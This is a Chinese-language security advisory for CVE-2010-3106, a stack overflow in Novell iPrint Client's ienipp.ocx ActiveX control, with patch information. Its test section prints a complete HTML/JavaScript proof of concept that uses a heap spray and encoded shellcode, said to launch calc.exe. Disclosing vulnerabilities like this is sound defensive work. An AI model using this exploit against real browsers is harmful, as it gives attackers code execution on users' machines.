发布日期：2010-07-30
更新日期：2010-08-06

受影响系统：

Novell iPrint Client 5.40

不受影响系统：

Novell iPrint Client 5.42

描述：

---

BUGTRAQ  ID: 42100
CVE ID: CVE-2010-3106

Novell iPrint打印解决方案允许用户向网络打印机发送文档。

Novell iPrint客户端所安装的ienipp.ocx ActiveX控件接受debug参数，参数应为yes或true。但如果提供了特定长度的字符串，ExecuteRequest方式中的一个处理循环就会破坏栈缓冲区，导致以运行Web浏览器用户的权限执行任意代码。

<*来源：Aaron Portnoy （aportnoy@ccs.neu.edu）
  
  链接：http://secunia.com/advisories/40782/
        http://marc.info/?l=full-disclosure&m=128104315412273&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object ID='target' classid='clsid:36723f97-7aa0-11d4-8919-ff2d71d0d32c'>  

  

</object>  

<script >  

      

     // Calc.exe  

     shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  

                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  

                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  

                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  

                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  

                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  

                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  

                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');  

                        

     nops=unescape('%u9090%u9090');  

     headersize =20;  

     slackspace= headersize + shellcode.length;  

     while(nops.length< slackspace) nops+= nops;  

     fillblock= nops.substring(0, slackspace);  

     block= nops.substring(0, nops.length- slackspace);  

     while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;  

     memory=new Array();  

     for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;  

     ret='';  

     for( counter=0; counter<=250; counter++) ret+=unescape("%0a%0a%0a%0a");      

    op = "op-client-interface-version";  

    dbg = "debug=";  

    target.ExecuteRequest (op, dbg+ret);  

      

</script>  

<html>  

  

</html>

http://www.exploit-db.com/download/15073

建议：

---

厂商补丁：

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://download.novell.com/Download?buildid=ftwZBxEFjIg~

浏览次数：2732
严重程度：0（网友投票）